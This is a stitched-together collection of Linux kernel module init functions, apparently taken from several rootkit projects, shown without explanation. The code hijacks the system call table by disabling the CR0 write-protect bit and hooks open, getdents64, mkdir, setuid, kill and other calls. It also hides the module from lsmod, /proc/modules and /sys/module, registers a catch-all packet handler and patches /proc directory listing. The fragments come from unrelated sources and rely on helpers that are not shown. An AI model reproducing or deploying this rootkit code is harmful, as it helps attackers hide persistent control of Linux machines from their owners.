static int __init hidden_init(void)
{
printk(KERN_INFO "Starting up module.\n");
/* Hide the module from proc/modules, Sys/modules tracking. */
list_del_init(&__this_module.list);
kobject_del(&THIS_MODULE->mkobj.kobj);
/* Locate address of the Syscall table in memory. */
if(!(sys_call_table = get_sys_call_table())) {
printk(KERN_INFO "Unable to locate Syscall table.");
return -1;
}
/* Disabling WP bit in control register cr0 to write to sys_call table. */
write_cr0(read_cr0() & (~ 0x10000));
/* Store open system call to use later. */
original_open = (void *)sys_call_table[__NR_open];
/* Write our modified read call to the syscall table. */
sys_call_table[__NR_open] = (unsigned long *) hidden_open;
/* Turning WP bit back on. */
write_cr0(read_cr0() | 0x10000);
return 0;
}
int hide_file_init(void)
{ /*module setup */
if (!(sys_call_table = get_sys_call_table())) {
printk(KERN_INFO "request sys_call_table failed!\n");
return -1;
}
disable_wp_protection();
orig_getdents64 = sys_call_table[__NR_getdents64];
sys_call_table[__NR_getdents64] = hacked_getdents64;
enable_wp_protection();
return 0;
}
int
init_module(void)
{
printk(KERN_ALERT "%s\n", "Greetings the World!");
sys_call_table = get_sys_call_table();
printk(KERN_ALERT "PAGE_OFFSET = %lx\n", PAGE_OFFSET);
printk(KERN_ALERT "sys_call_table = %p\n", sys_call_table);
printk(KERN_ALERT "sys_call_table - PAGE_OFFSET = %lu MiB\n",
((unsigned long)sys_call_table -
(unsigned long)PAGE_OFFSET) / 1024 / 1024);
return 0;
}
static int hijack_init(void)
{
printk(KERN_INFO "Hijack init..");
sys_call_table = get_sys_call_table();
if (!sys_call_table)
{
printk(KERN_ERR "Unable to locate system call table");
return EPERM;
}
DISABLE_WRITE_PROT;
original_open = (void *)sys_call_table[__NR_open];
sys_call_table[__NR_open] = (unsigned long *) custom_open;
ENABLE_WRITE_PROT;
return 0;
}
static int map_sys_call_table(void)
{
unsigned long *syscalltab = get_sys_call_table();
unsigned long syscalladr = (unsigned long)virt_to_phys(syscalltab);
unsigned long offset = syscalladr & (PAGE_SIZE-1);
unsigned long start = align_address(syscalladr);
unsigned long len = PAGE_SIZE;
/* const unsigned int num_pages=1; */
sys_call_adr = ioremap(start, len);
if (IS_ERR(sys_call_adr)) {
PR_ERROR("unable to ioremap");
return PTR_ERR(sys_call_adr);
} else {
sys_call_adr_precise = sys_call_adr+offset;
PR_DEBUG("got precise %p", sys_call_adr_precise);
return 0;
}
}
static int lkm_init(void) {
unsigned int orig_cr0;
printk(KERN_ALERT "lkm_init\n");
conivent_printf("lkm_init");
syscall_table = (unsigned int*) get_sys_call_table();
if(syscall_table == 0)
{
printk(KERN_ALERT "can't find syscall_table addr\n");
return -1;
}
origin_mkdir = syscall_table[__NR_mkdir];
//printk("addr of old_handler %x\n", old_handler);
orig_cr0 = clear_and_return_cr0();
syscall_table[__NR_mkdir] = (unsigned long) modified_mkdir;
setback_cr0(orig_cr0);
return 0;
}
int init_module(void)
{
// find_offset();
get_sys_call_table();
// Get address of sys_calls and store good copy
orig_getdents64 = sys_call_table[__NR_GETDENTS64];
orig_write = sys_call_table[__NR_WRITE];
orig_kill = sys_call_table[__NR_KILL];
orig_close = sys_call_table[__NR_CLOSE];
orig_open = sys_call_table[__NR_OPEN];
orig_creat = sys_call_table[__NR_CREAT];
orig_rmdir = sys_call_table[__NR_RMDIR];
orig_mkdir = sys_call_table[__NR_MKDIR];
orig_getuid = sys_call_table[__NR_GETUID];
orig_unlink = sys_call_table[__NR_UNLINK];
orig_execve = sys_call_table[__NR_EXECVE];
orig_stat = sys_call_table[__NR_STAT];
// orig_delete_module = sys_call_table[__NR_DEL_MOD];
// orig_init_module = sys_call_table[__NR_INIT_MOD];
// Overwrite sys_call_table with our versions of sys_calls
// sys_call_table[__NR_DEL_MOD] = our_delete_module;
// sys_call_table[__NR_INIT_MOD] = our_init_module;
sys_call_table[__NR_WRITE] = our_write;
sys_call_table[__NR_UNLINK] = our_unlink;
sys_call_table[__NR_GETDENTS64] = our_getdents64;
sys_call_table[__NR_MKDIR] = our_mkdir;
sys_call_table[__NR_RMDIR] = our_rmdir;
sys_call_table[__NR_CREAT] = our_creat;
sys_call_table[__NR_CLOSE] = our_close;
sys_call_table[__NR_KILL] = our_kill;
sys_call_table[__NR_OPEN] = our_open;
sys_call_table[__NR_GETUID] = our_getuid;
sys_call_table[__NR_STAT] = our_stat;
//sys_call_table[__NR_EXECVE] = our_execve;
return 0;
}
/* LKM init */
int __init lkm_init(void)
{
// this module pointer
struct module *mod;
// this module list
struct list_head *m_list;
// this module kernel object
struct kobject *m_kobj;
// misc system information structure
struct new_utsname *uts;
uts = utsname();
dbgprint(MODULE_NAME " loaded: %s %s %s %s %s %s\n", uts->sysname, uts->nodename, uts->release, uts->version, uts->machine, uts->domainname);
// Trying to find sys_call_table address using MSR method
//sys_call_table = get_writable_addr(get_sys_call_table());
sys_call_table = get_sys_call_table();
if(sys_call_table == NULL) {
// Otherwise try to find it using bruteforce
//sys_call_table = get_writable_addr(get_sys_call_table_brute());
sys_call_table = get_sys_call_table_brute();
}
if(sys_call_table == NULL) {
dbgprint("cannot find sys_call_table addr\n");
return -1;
} else {
dbgprint("our real sys_call_table addr is: 0x%p\n", sys_call_table);
}
#ifdef CONFIG_IA32_EMULATION
// Trying to find IA32 emulation sys_call_table address via IDT
//ia32_sys_call_table = get_writable_addr(get_ia32_sys_call_table());
ia32_sys_call_table = get_ia32_sys_call_table();
if(ia32_sys_call_table == NULL) {
dbgprint("cannot find ia32_sys_call_table addr\n");
return -1;
} else {
dbgprint("our real ia32_sys_call_table addr is: 0x%p\n", ia32_sys_call_table);
}
#endif
dbgprint("sys_close addr: 0x%p\n", (void *) sys_close);
dbgprint("sys_call_table[__NR_close] addr: 0x%p\n", (void *) sys_call_table[__NR_close]);
// hook sys_setuid
//set_addr_rw(sys_call_table);
set_cr0_rw();
o_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = h_setuid;
//set_addr_ro(sys_call_table);
set_cr0_ro();
// network packets handling
net_p_all_pkt.type = htons(ETH_P_ALL);
net_p_all_pkt.func = (void *) net_p_all_chk;
net_p_all_pkt.dev = NULL;
install_packet_type(&net_p_all_pkt);
// trying to hide module
mod = &__this_module;
m_list = &mod->list;
m_kobj = &mod->mkobj.kobj;
#ifndef I_DEBUG
// Removing module from lsmod and /proc/modules, by removing double linked list element.
// Hiding from lsmod
m_list->next->prev = m_list->prev;
m_list->prev->next = m_list->next;
// Removing myself from /proc/modules
list_del_init(m_list);
// Remove our kernel object, to hide from /sys/module/
kobject_del(m_kobj);
#endif
// VFS patching
patch_vfs_readdir("/proc", &readdir_orig, readdir_new);
// A non 0 return means init_module failed; module can't be loaded.
return 0;
}